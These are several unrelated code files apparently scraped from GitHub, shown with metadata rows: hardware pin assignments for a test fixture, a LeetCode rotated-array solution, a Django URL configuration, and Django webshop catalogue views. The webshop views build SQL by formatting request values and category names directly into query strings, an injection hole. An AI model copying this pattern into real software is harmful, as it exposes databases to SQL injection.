},
'din22': {
'comment': 'Digital input channel 22',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 6,
'direction': 1,
'polarity': 0,
},
'din23': {
'comment': 'Digital input channel 23',
'type': 'IO',
'device': 'digital_1',
'port': 0,
'bit': 7,
'direction': 1,
'polarity': 0,
},
'din24': {
'comment': 'Digital input channel 24',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 0,
'direction': 1,
'polarity': 0,
},
'din25': {
'comment': 'Digital input channel 25',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 1,
'direction': 1,
'polarity': 0,
},
'din26': {
'comment': 'Digital input channel 26',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 2,
'direction': 1,
'polarity': 0,
},
'din27': {
'comment': 'Digital input channel 27',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 3,
'direction': 1,
'polarity': 0,
},
'din28': {
'comment': 'Digital input channel 28',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 4,
'direction': 1,
'polarity': 0,
},
'din29': {
'comment': 'Digital input channel 29',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 5,
'direction': 1,
'polarity': 0,
},
'din30': {
'comment': 'Digital input channel 30',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 6,
'direction': 1,
'polarity': 0,
},
'din31': {
'comment': 'Digital input channel 31',
'type': 'IO',
'device': 'digital_1',
'port': 1,
'bit': 7,
'direction': 1,
'polarity': 0,
},
# 3rd tca9539 IO port expander - 16 digital outputs
'dout0': {
'comment': 'Digital output channel 0',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 0,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout1': {
'comment': 'Digital output channel 1',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 1,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout2': {
'comment': 'Digital output channel 2',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 2,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout3': {
'comment': 'Digital output channel 3',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 3,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout4': {
'comment': 'Digital output channel 4',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 4,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout5': {
'comment': 'Digital output channel 5',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 5,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout6': {
'comment': 'Digital output channel 6',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 6,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout7': {
'comment': 'Digital output channel 7',
'type': 'IO',
'device': 'digital_2',
'port': 0,
'bit': 7,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout8': {
'comment': 'Digital output channel 8',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 0,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout9': {
'comment': 'Digital output channel 9',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 1,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout10': {
'comment': 'Digital output channel 10',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 2,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout11': {
'comment': 'Digital output channel 11',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 3,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout12': {
'comment': 'Digital output channel 12',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 4,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout13': {
'comment': 'Digital output channel 13',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 5,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout14': {
'comment': 'Digital output channel 14',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 6,
'direction': 0,
'polarity': 0,
'init': 0
},
'dout15': {
'comment': 'Digital output channel 15',
'type': 'IO',
'device': 'digital_2',
'port': 1,
'bit': 7,
'direction': 0,
'polarity': 0,
'init': 0
},
# 4th tca9539 IO port expander - 16 digital outputs
'nc_0': { # channel 0 - not connected
'comment': 'Digital control bit 0 - intentionally not connected',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 0,
'direction': 0,
'polarity': 0,
'init': 0
},
'dut_power_enable_output': { # channel 1
'comment': 'DUT power enable',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 1,
'direction': 0,
'polarity': 0, # non-inverted: set() to enable
'init': 0
},
'dut_current_limit_reset_output': { # channel 2
'comment': 'DUT current limit reset',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 2,
'direction': 0,
'polarity': 0, # non-inverted: set() selects latched ALERT mode
'init': 0
},
'dut_current_limit_alert_input': { # channel 3
'comment': 'DUT current limit alert',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 3,
'direction': 1,
'polarity': 1, # inverted: Over-current ALERT drives pin HIGH
'init': 0
},
'dut_board_loaded_input': { # channel 4
'comment': 'DUT loaded interlock signal from pogo board',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 4,
'direction': 1,
'polarity': 1,
'init': 0
},
'control_uncommitted_0': { # channel 5
'comment': 'Uncommitted control bit 0',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 5,
'direction': 0,
'polarity': 0,
'init': 0
},
'control_uncommitted_1': { # channel 6
'comment': 'Uncommitted control bit 1',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 6,
'direction': 0,
'polarity': 0,
'init': 0
},
'nc_7': { # channel 7 - not connected
'comment': 'Digital control bit 7 - intentionally not connected',
'type': 'IO',
'device': 'control',
'port': 0,
'bit': 7,
'direction': 0,
'polarity': 0,
'init': 0
},
'button1': { # channel 8
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 0,
'direction': 1,
'polarity': 1,
},
'led1': { # channel 9
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 1,
'direction': 0,
'polarity': 1,
'init': 0
},
'button2': { # channel 10
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 2,
'direction': 1,
'polarity': 1,
},
'led2': { # channel 11
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 3,
'direction': 0,
'polarity': 1,
'init': 0
},
'button3': { # channel 12
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 4,
'direction': 1,
'polarity': 1,
},
'led3': { # channel 13
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 5,
'direction': 0,
'polarity': 1,
'init': 0
},
'button4': { # channel 14
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 6,
'direction': 1,
'polarity': 1,
},
'led4': { # channel 15
'type': 'IO',
'device': 'control',
'port': 1,
'bit': 7,
'direction': 0,
'polarity': 1,
'init': 0
},
# #########################
# ### Analog Input Pins ###
# #########################
# 1st adc128d818 Analog to Digital converter - 8 analog inputs
'adc0': { # Configuration for ADCs
'type': 'ADC', # Type must be 'ADC'
'device': 'analog_in0', # name of device hosting pin
'bit': 0, # input channel
'scale': 'vref' # full scale input returns: Vref (i.e. returns input volts)
# 'scale': 1.0 # full scale input returns: 1.0 (by way of example)
# 'scale': 100.0 # full scale input returns: 100 (by way of example)
},
'adc1': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 1,
'scale': 'vref'
},
'adc2': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 2,
'scale': 'vref'
},
'adc3': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 3,
'scale': 'vref'
},
'adc4': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 4,
'scale': 'vref'
},
'adc5': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 5,
'scale': 'vref'
},
'adc6': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 6,
'scale': 'vref'
},
'adc7': {
'type': 'ADC',
'device': 'analog_in0',
'bit': 7,
'scale': 'vref'
},
# 2nd adc128d818 Analog to Digital converter - 8 analog inputs
'adc8': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 0,
'scale': 'vref'
},
'adc9': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 1,
'scale': 'vref'
},
'adc10': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 2,
'scale': 'vref'
},
'adc11': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 3,
'scale': 'vref'
},
'adc12': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 4,
'scale': 'vref'
},
'adc13': {
'type': 'ADC',
'device': 'analog_in1',
'bit': 5,
'scale': 'vref'
},
'dut_scaled_voltage_input': {
'comment': 'DUT scaled voltage input',
'type': 'ADC',
'device': 'analog_in1',
'bit': 6,
'scale': 27.05 # set to read DUT scaled voltage as volts
},
'dut_scaled_current_input': {
'comment': 'DUT scaled current input',
'type': 'ADC',
'device': 'analog_in1',
'bit': 7,
# 'scale': 'vref' # set to read DUT current as true voltage
'scale': 2.47
# 'scale': 13.5 # set to read DUT current as amps @ 24 volts input
},
# ##########################
# ### Analog Output Pins ###
# ##########################
# 1st dac5574 Digital to Analog converter - 4 analog outputs
'dac1': { # 0x4C, Vout A
'comment': 'DAC channel 1', # optional
'type': 'DAC', # must be 'DAC'
'device': 'analog_out0', # name of device hosting pin
'bit': 0, # output channel
'scale': 3.3 # value for full scale output
},
'dac3': { # 0x4C, Vout B
'comment': 'DAC channel 3',
'type': 'DAC',
'device': 'analog_out0',
'bit': 1,
'scale': 3.3
},
'dac0': { # 0x4C, Vout C
'comment': 'DAC channel 0',
'type': 'DAC',
'device': 'analog_out0',
'bit': 2,
'scale': 3.3
},
'dut_current_limit_output': { # 0x4C, Vout D
'comment': 'DUT current limit output',
'type': 'DAC',
'device': 'analog_out0',
'bit': 3,
# 'scale': 16.5 # normalizes set(n) current limit to Amps
'scale': 2.47 # outputs in volts
},
# 2nd dac5574 Digital to Analog converter - 4 analog outputs
'dac2': { # 0x4F, Vout A
'comment': 'DAC channel 2',
'type': 'DAC',
'device': 'analog_out1',
'bit': 0,
'scale': 3.3
},
'dac5': { # 0x4F, Vout B
'comment': 'DAC channel 5',
'type': 'DAC',
'device': 'analog_out1',
'bit': 1,
'scale': 3.3
},
'dac4': { # 0x4F, Vout C
'comment': 'DAC channel 4',
'type': 'DAC',
'device': 'analog_out1',
'bit': 2,
'scale': 3.3
},
'dac_nc': { # 0x4F, Vout D
'comment': 'DAC channel intentionally not connected',
'type': 'DAC',
'device': 'analog_out1',
'bit': 3,
'scale': 3.3
},
}
# Do Not Delete
if __name__ == "__main__":
print("Tried to execute pin_assigmnents - EXITING")
| synthetos/TestCode | code/pin_assignments.py | pin_assignments.py | py | 19,571 | python | en | code | 0 | github-code | 13 |
24534341590 | from ds_templates import test_series
from test_cases import cases
"""
First check if the list is UNrotated (nums[0] < nums[-1] or len(nums) == 1). Otherwise use a binary search to search
for the condition where nums[i] < nums[i-1]. This signifies the loop in the list, and the value nums[i] should be
returned. You should never run into an index error with this algorithm b/c the only index where that would occur is on
the first element. The binary search will never reach the first element because of the upfront test to see if it's an
unrotated list.
[4, 5, 6, 7, 8, 9, 10, 1, 2, 3]
[9, 10, 1, 2, 3, 4, 5, 6, 7, 8]
[4, 5, 6, 7, 8, 9, 10, 1, 2, 3]
"""
def find_min(nums: list[int]) -> int:
l, r = 0, len(nums) - 1
if len(nums) == 1 or nums[0] < nums[-1]:
return nums[0]
while l < r:
mid = (l + r) // 2
if nums[mid] < nums[mid-1]:
return nums[mid]
elif nums[mid] < nums[0]:
r = mid - 1
else:
l = mid + 1
return nums[l]
test_series.test_series(find_min, cases)
| Hintzy/leetcode | Medium/153_find_min_in_rotated_sorted_array/find_min_rs_array.py | find_min_rs_array.py | py | 1,063 | python | en | code | 0 | github-code | 13 |
7988366604 | """
URL configuration for app project.
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/4.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.index),
path('about/', views.about),
path('player/', views.player),
path('contact/', views.contact),
path('index/', views.index),
path('course/', views.course),
path('calculator/', views.calculator),
path('marksheet/', views.marksheet),
path('fruit/', views.fruit),
path('evenodd/', views.evenodd),
path('playerdetail/',views.playerdetail),
# path('course/<int:courseid>',views.coursesDetails) # Dynamic url int
# path('course/<str:courseid>', views.coursesDetails) # Dynamic url str
# path('course/<slug:courseid>', views.coursesDetails) # Dynamic url slug
#path('course/<courseid>', views.coursesDetails) # Dynamic url NONE Type
]
| AditySuraj77/Django_Concept | app/app/urls.py | urls.py | py | 1,493 | python | en | code | 0 | github-code | 13 |
38587033317 | from django.shortcuts import render
from django.db import connection
from django.http import Http404
from frankie_web_platform import settings
from webshop.models import *
from django.test.client import RequestFactory
from django.http import JsonResponse
def get_selected_parameters_values(request) -> {int: [int]}:
res = []
for key, val in request.GET.items():
if key == 'price_from' or key == 'price_to':
pass
else:
res.append({'id': int(key), 'values': [int(v) for v in request.GET.getlist(key)]})
return res
def get_selected_parameters(request) -> [int]:
res = []
for key, value in request.GET.items():
if key == 'price_from' or key == 'price_to':
pass
else:
res.append(int(key))
return res
def get_selected_values(request) -> [int]:
res = []
for key, value in request.GET.items():
if key == 'price_from' or key == 'price_to':
pass
else:
res.append(int(value))
return res
def get_price(request) -> (float, float):
price_from = None
price_to = None
for key, value in request.GET.items():
if key == 'price_from':
price_from = float(value)
elif key == 'price_to':
price_to = float(value)
else:
pass
return price_from, price_to
def list_to_sql_array(value: list) -> str:
res = "("
for i in range(value.__len__() - 1):
res += value[i].__str__() + ', '
res += value[value.__len__() - 1].__str__() + ")"
return res
def check_if_param_in_params(param: int, params: [{}]) -> bool:
for i in params:
if param == i['id']:
return True
return False
def check_if_value_in_values(value: int, param: int, params: [{}]) -> bool:
for i in params:
if i['id'] == param and value in i['values']:
return True
return False
def get_filter_from_query(selected, parameters):
filter_structure = {}
for parameter in parameters:
filter_structure[parameter[1]] = {'first_image': parameter[2],
'second_image': parameter[3],
'weight': parameter[4],
'id': parameter[0],
}
filter_structure[parameter[1]]['values'] = []
for param in parameters:
if param[1] == parameter[1]:
if check_if_param_in_params(param[0], selected):
if check_if_value_in_values(param[5], param[0], selected):
filter_structure[parameter[1]]['values'].append({'value': param[6],
'first_image': param[7],
'second_image': param[8],
'weight': param[9],
'id': param[5],
'count': param[10],
'checked': True})
else:
filter_structure[parameter[1]]['values'].append({'value': param[6],
'first_image': param[7],
'second_image': param[8],
'weight': param[9],
'id': param[5],
'count': param[10],
'checked': False})
else:
filter_structure[parameter[1]]['values'].append({'value': param[6],
'first_image': param[7],
'second_image': param[8],
'weight': param[9],
'id': param[5],
'count': param[10],
'checked': False})
filter_structure = sorted(filter_structure.items(), key=lambda x: x[1]['weight'])
return filter_structure
def get_correctors_for_product(all_correctors, product_id):
res = []
for i in all_correctors:
if i[1] == product_id:
res.append(i)
return res
def get_products(filtered_products, order: str):
conn = connection
cur = conn.cursor()
all_correctors = cur.execute("SELECT "
"ppc.id, "
"ppc.product_id, "
"(ppc.new_price * prov.coefficient) as new_price, "
"ppc.name FROM product_price_correctors "
"AS ppc "
"JOIN products AS prod ON ppc.product_id = prod.id "
"JOIN providers AS prov ON prod.provider_id = prov.id").fetchall()
products = {}
products_ids = []
img_ids = []
for product in filtered_products:
default_price = product[5]
default_price_new = product[5]
if product[21] is not None:
default_price_new = default_price - default_price / 100 * product[21]
if product[24] is not None:
default_price_new += default_price / 100 * product[24]
correctors = []
images = []
if product[0] in products:
correctors = products[product[0]]['price_correctors']
images = products[product[0]]['images']
products[product[0]] = {'name': product[1],
'code': product[2],
'url': product[3],
'weight': product[4],
'default_new_price': default_price_new,
'default_price': default_price,
'description': product[7],
'mass': product[8],
'is_new': product[9],
'is_top': product[10],
'images': images,
'price_correctors': correctors,
'sale_name': product[22],
'sale_image': product[23],
'date_on_add': product[28]}
if product[0] not in products_ids:
products_ids.append(product[0])
for corrector in get_correctors_for_product(all_correctors, product[0]):
price = corrector[2]
price_new = corrector[2]
if price is None:
price = product[5]
price_new = product[5]
if product[21] is not None:
price_new = price - price / 100 * product[21]
if product[24] is not None:
price_new += price / 100 * product[24]
products[product[0]]['price_correctors'].append({
'id': corrector[0],
'name': corrector[3],
'price_new': price_new,
'price': price})
for prod in filtered_products:
if prod[0] == product[0]:
if prod[14] not in img_ids and prod[14] is not None:
img_ids.append(prod[14])
products[prod[0]]['images'].append({
'id': prod[14],
'weight': prod[15],
'original': prod[16],
'large': prod[17],
'medium': prod[18],
'small': prod[19]})
break
if order == "price_ASC":
products = sorted(products.items(), key=lambda x: x[1]['default_price'], reverse=False)
elif order == "price_DESC":
products = sorted(products.items(), key=lambda x: x[1]['default_price'], reverse=True)
elif order == "date_ASC":
products = sorted(products.items(), key=lambda x: x[1]['date_on_add'], reverse=False)
elif order == "date_DESC":
products = sorted(products.items(), key=lambda x: x[1]['date_on_add'], reverse=True)
elif order == "weight":
products = sorted(products.items(), key=lambda x: x[1]['weight'], reverse=False)
else:
raise Http404('Page not found')
return products, products_ids
# noinspection SqlResolve
def filter_products(category, values, order: str, product_on_page: str, page: str,
price_from: float = None, price_to: float = None):
conn = connection
cur = conn.cursor()
order_str = "prod.weight"
if order == "price_ASC":
order_str = "default_price ASC"
if order == "price_DESC":
order_str = "default_price DESC"
if values.__len__() == 1:
query = str.format(
"SELECT "
"prod.id AS prod_id, " # 0
"prod.name AS product_name, " # 1
"prod.code, " # 2
"prod.url, " # 3
"prod.weight, " # 4
"(prod.default_price * prod_providers.coefficient) AS default_price, " # 5
"prod.active, " # 6
"prod.description, " # 7
"prod.mass, " # 8
"prod.is_new, " # 9
"prod.is_top, " # 10
"prod_price_cor.id AS price_cor_id, " # 11
"prod_price_cor.name AS price_cor_name, " # 12
"(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, " # 13
"prod_image.id AS image_id, " # 14
"prod_image.weight AS prod_image_weight, " # 15
"prod_image.image_original, " # 16
"prod_image.image_large, " # 17
"prod_image.image_medium, " # 18
"prod_image.image_small, " # 19
"prod.category_id, " # 20
"prod_sales.percent, " # 21
"prod_sales.name, " # 22
"prod_sales.image, " # 23
"prod_margins.percent, " # 24
"prod.provider_id AS provider_id, " # 25
"prod_sales.id AS sale_id, " # 26
"prod_margins.id AS margin_id, " # 27
"prod.date_on_add " # 28
"FROM products AS prod "
"JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
"JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
"AND prod_val.value_id IN {1} "
"JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
"LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
"LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
"LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
"LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
"WHERE prod.active AND default_price BETWEEN {3} AND {4} ORDER BY {2}, prod_image.weight",
category, list_to_sql_array(values[0]['values']), order_str, price_from, price_to)
else:
query = str.format(
"SELECT "
"prod.id AS prod_id, " # 0
"prod.name AS product_name, " # 1
"prod.code, " # 2
"prod.url, " # 3
"prod.weight, " # 4
"(prod.default_price * prod_providers.coefficient) AS default_price, " # 5
"prod.active, " # 6
"prod.description, " # 7
"prod.mass, " # 8
"prod.is_new, " # 9
"prod.is_top, " # 10
"prod_price_cor.id AS price_cor_id, " # 11
"prod_price_cor.name AS price_cor_name, " # 12
"(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, " # 13
"prod_image.id AS image_id, " # 14
"prod_image.weight AS prod_image_weight, " # 15
"prod_image.image_original, " # 16
"prod_image.image_large, " # 17
"prod_image.image_medium, " # 18
"prod_image.image_small, " # 19
"prod.category_id, " # 20
"prod_sales.percent, " # 21
"prod_sales.name, " # 22
"prod_sales.image, " # 23
"prod_margins.percent AS margin_percent, " # 24
"prod.provider_id AS provider_id, " # 25
"prod_sales.id AS sale_id, " # 26
"prod_margins.id AS margin_id, " # 27
"prod.date_on_add " # 28
"FROM products AS prod "
"JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
"JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
"AND prod_val.value_id IN {1} "
"JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
"LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
"LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
"LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
"LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
"WHERE prod.active ORDER BY {2} AND default_price BETWEEN {3} AND {4}, prod_image.weight",
category, list_to_sql_array(values[0]['values']), order_str, price_from, price_to)
for val_id in range(1, values.__len__()):
query = str.format(
"SELECT "
"prod.prod_id AS prod_id, " # 0
"prod.product_name AS product_name, " # 1
"prod.code, " # 2
"prod.url, " # 3
"prod.weight, " # 4
"prod.default_price AS default_price, " # 5
"prod.active, " # 6
"prod.description, " # 7
"prod.mass, " # 8
"prod.is_new, " # 9
"prod.is_top, " # 10
"prod.price_cor_id AS price_cor_id, " # 11
"prod.price_cor_name AS price_cor_name, " # 12
"prod.new_price AS new_price, " # 13
"prod_image.id AS image_id, " # 14
"prod.prod_image_weight AS prod_image_weight, " # 15
"prod_image.image_original, " # 16
"prod_image.image_large, " # 17
"prod_image.image_medium, " # 18
"prod_image.image_small, " # 19
"prod.category_id, " # 20
"prod_sales.percent, " # 21
"prod_sales.name, " # 22
"prod_sales.image, " # 23
"prod.margin_percent, " # 24
"prod.provider_id AS provider_id, " # 25
"prod.sale_id AS sale_id, " # 26
"prod.margin_id AS margin_id, " # 27
"prod.date_on_add " # 28
"FROM ({0}) AS prod "
"JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{1}' "
"JOIN product_parameters_values AS prod_val "
"ON prod_val.product_id = prod.prod_id AND prod_val.value_id IN {2} "
"JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
"LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
"LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
"LEFT JOIN product_price_correctors AS prod_price_cor ON prod.prod_id = prod_price_cor.product_id "
"LEFT JOIN product_image_positions AS prod_image ON prod.prod_id = prod_image.product_id "
"WHERE prod.active ORDER BY {3} AND default_price BETWEEN {4} AND {5}, prod_image.weight", query,
category, list_to_sql_array(values[val_id]['values']), order_str, price_from, price_to)
cur.execute(query)
products_selected = cur.fetchall()
products, products_ids = get_products(products_selected, order)
max_page = round(products.__len__() / int(product_on_page))
products = products[(int(page) - 1) * int(product_on_page): int(page) * int(product_on_page)]
return products, products_ids, max_page
# noinspection SqlResolve
def catalogue_category_filter(request, category: str, order: str = "weight",
product_on_page: str = settings.PRODUCT_ON_PAGE,
page: str = 1) -> str:
conn = connection
cur = conn.cursor()
price_min = cur.execute("SELECT MIN(prod.default_price) "
"FROM products as prod "
"JOIN categories AS cat "
"ON prod.category_id = cat.id AND cat.name = %s", [category]).fetchall()[0][0]
price_max = cur.execute("SELECT MAX(prod.default_price) "
"FROM products as prod "
"JOIN categories AS cat "
"ON prod.category_id = cat.id AND cat.name = %s", [category]).fetchall()[0][0]
if request.GET:
values = get_selected_parameters_values(request)
price_from, price_to = get_price(request)
if price_from is None:
price_from = price_min
if price_to is None:
price_to = price_max
products, products_ids, max_page = filter_products(category, values, order, product_on_page, page,
price_from, price_to)
else:
cur.execute(
str.format("SELECT "
"prod.id AS prod_id, " # 0
"prod.name AS product_name, " # 1
"prod.code, " # 2
"prod.url, " # 3
"prod.weight, " # 4
"(prod.default_price * prod_providers.coefficient) AS default_price, " # 5
"prod.active, " # 6
"prod.description, " # 7
"prod.mass, " # 8
"prod.is_new, " # 9
"prod.is_top, " # 10
"prod_price_cor.id AS price_cor_id, " # 11
"prod_price_cor.name AS price_cor_name, " # 12
"(prod_price_cor.new_price * prod_providers.coefficient) AS new_price, " # 13
"prod_image.id AS image_id, " # 14
"prod_image.weight AS prod_image_weight, " # 15
"prod_image.image_original, " # 16
"prod_image.image_large, " # 17
"prod_image.image_medium, " # 18
"prod_image.image_small, " # 19
"prod.category_id, " # 20
"prod_sales.percent, " # 21
"prod_sales.name, " # 22
"prod_sales.image, " # 23
"prod_margins.percent, " # 24
"prod.provider_id AS provider_id, " # 25
"prod.sale_id AS sale_id, " # 26
"prod.margin_id AS margin_id, " # 27
"prod.date_on_add " # 28
"FROM products AS prod "
"JOIN categories AS cat ON cat.id = prod.category_id AND cat.name = '{0}' "
"JOIN providers AS prod_providers ON prod.provider_id = prod_providers.id "
"LEFT JOIN sales AS prod_sales ON prod.sale_id = prod_sales.id "
"LEFT JOIN margins AS prod_margins ON prod.margin_id = prod_margins.id "
"JOIN product_parameters_values AS prod_val ON prod_val.product_id = prod.id "
"LEFT JOIN product_price_correctors AS prod_price_cor ON prod.id = prod_price_cor.product_id "
"LEFT JOIN product_image_positions AS prod_image ON prod.id = prod_image.product_id "
"AND prod.active "
"ORDER BY prod.weight, prod_image.weight",
category))
products_selected = cur.fetchall()
products, products_ids = get_products(products_selected, order)
max_page = round(products.__len__() / int(product_on_page))
products = products[(int(page) - 1) * int(product_on_page): int(page) * int(product_on_page)]
if products_ids.__len__() > 0:
cur.execute(
str.format("SELECT "
"prod_par.id, " # 0
"prod_par.name, " # 1
"prod_par.first_image, " # 2
"prod_par.second_image, " # 3
"prod_par.weight, " # 4
"val.id AS val_id, " # 5
"val.value, " # 6
"val.first_image AS val_first_image, " # 7
"val.second_image AS val_second_image, " # 8
"val.weight AS val_weight, " # 9
"(SELECT COUNT(id) FROM product_parameters_values "
"AS ppv WHERE val.id = ppv.value_id AND ppv.product_id IN {1}) AS count" # 10
" FROM product_parameters AS prod_par JOIN product_parameters_available_value AS val ON "
"val.product_parameter_id = prod_par.id JOIN categories AS cat ON cat.id = prod_par.category_id "
"AND cat.name = '{0}' "
"LEFT JOIN product_parameters_values AS prod_param_val "
"ON val.id = prod_param_val.value_id "
"GROUP BY prod_par.id, val.id "
"ORDER BY prod_par.weight ASC, val.weight ASC", category, list_to_sql_array(products_ids)))
else:
cur.execute(
str.format("SELECT "
"prod_par.id, " # 0
"prod_par.name, " # 1
"prod_par.first_image, " # 2
"prod_par.second_image, " # 3
"prod_par.weight, " # 4
"val.id AS val_id, " # 5
"val.value, " # 6
"val.first_image AS val_first_image, " # 7
"val.second_image AS val_second_image, " # 8
"val.weight AS val_weight, " # 9
"(SELECT COUNT(id) FROM product_parameters_values "
"AS ppv WHERE val.id = ppv.value_id) " # 10
" FROM product_parameters AS prod_par JOIN product_parameters_available_value AS val ON "
"val.product_parameter_id = prod_par.id JOIN categories AS cat ON cat.id = prod_par.category_id "
"AND cat.name = '{0}' "
"LEFT JOIN product_parameters_values AS prod_param_val "
"ON val.id = prod_param_val.value_id "
"GROUP BY prod_par.id, val.id "
"ORDER BY prod_par.weight ASC, val.weight ASC", category))
parameters = cur.fetchall()
values = get_selected_parameters_values(request)
return {'products': products, 'filter': get_filter_from_query(values, parameters),
'max_page': max_page, 'price_min': price_min, 'price_max': price_max}
def catalogue_category_filter_json(request, category: str, order: str = "weight",
product_on_page: str = settings.PRODUCT_ON_PAGE,
page: str = 1):
contents = catalogue_category_filter(request, category, order, product_on_page, page)
products_data = []
products = contents['products']
for key, product in products:
correctors_data = []
correctors = product['price_correctors']
if correctors:
for corrector in correctors:
correctors_data.append({
'id': corrector['id'],
'data': {
'name': corrector['name'],
'price': corrector['price'],
'price_new': corrector['price_new'],
},
})
images_data = []
images = product['images']
if images:
for image in images:
images_data.append({
'id': image['id'],
'data': {
'original': image['original'],
'large': image['large'],
'medium': image['medium'],
'small': image['small'],
'weight': image['weight'],
},
})
products_data.append({
'id': key,
'data': {
'name': product['name'],
'code': product['code'],
'url': product['url'],
'weight': product['weight'],
'default_new_price': product['default_new_price'],
'default_price': product['default_price'],
'description': product['description'],
'mass': product['mass'],
'is_new': product['is_new'],
'is_top': product['is_top'],
'images': images_data,
'price_correctors': correctors_data,
'sale_name': product['sale_name'],
'sale_image': product['sale_image'],
'date_on_add': product['date_on_add'],
},
})
contents_data = {
'products': products_data,
'max_page': contents['max_page'],
'price_max': contents['price_max'],
'price_min': contents['price_min'],
'filter': contents['filter'],
}
return JsonResponse(contents_data, charset='utf-8')
def catalogue_category(request, category: str, order: str = "weight", product_on_page: str = settings.PRODUCT_ON_PAGE,
page: str = 1):
if page is None:
page = 1
if product_on_page is None:
product_on_page = settings.PRODUCT_ON_PAGE
if order is None:
order = "weight"
try:
category = Category.objects.get(url=category)
except Exception:
raise Http404('Page not found')
template = category.template.path
return render(request, template, {'category': category})
def catalogue_prefilter(request, category: str, name: str):
try:
prefilter = PreFilter.objects.get(url=name)
except Exception:
raise Http404('Page not found')
original_url = prefilter.original_url
request = RequestFactory().get(prefilter.original_url)
beg_pos = str.format('/catalogue/{0}/', category).__len__()
template = prefilter.template.path
try:
end_pos = original_url.index('/?', beg_pos)
order = original_url[beg_pos:end_pos]
return render(request, template, {'prefilter': prefilter})
except ValueError:
products = catalogue_category_filter(request, category)
return render(request, template, {'prefilter': prefilter})
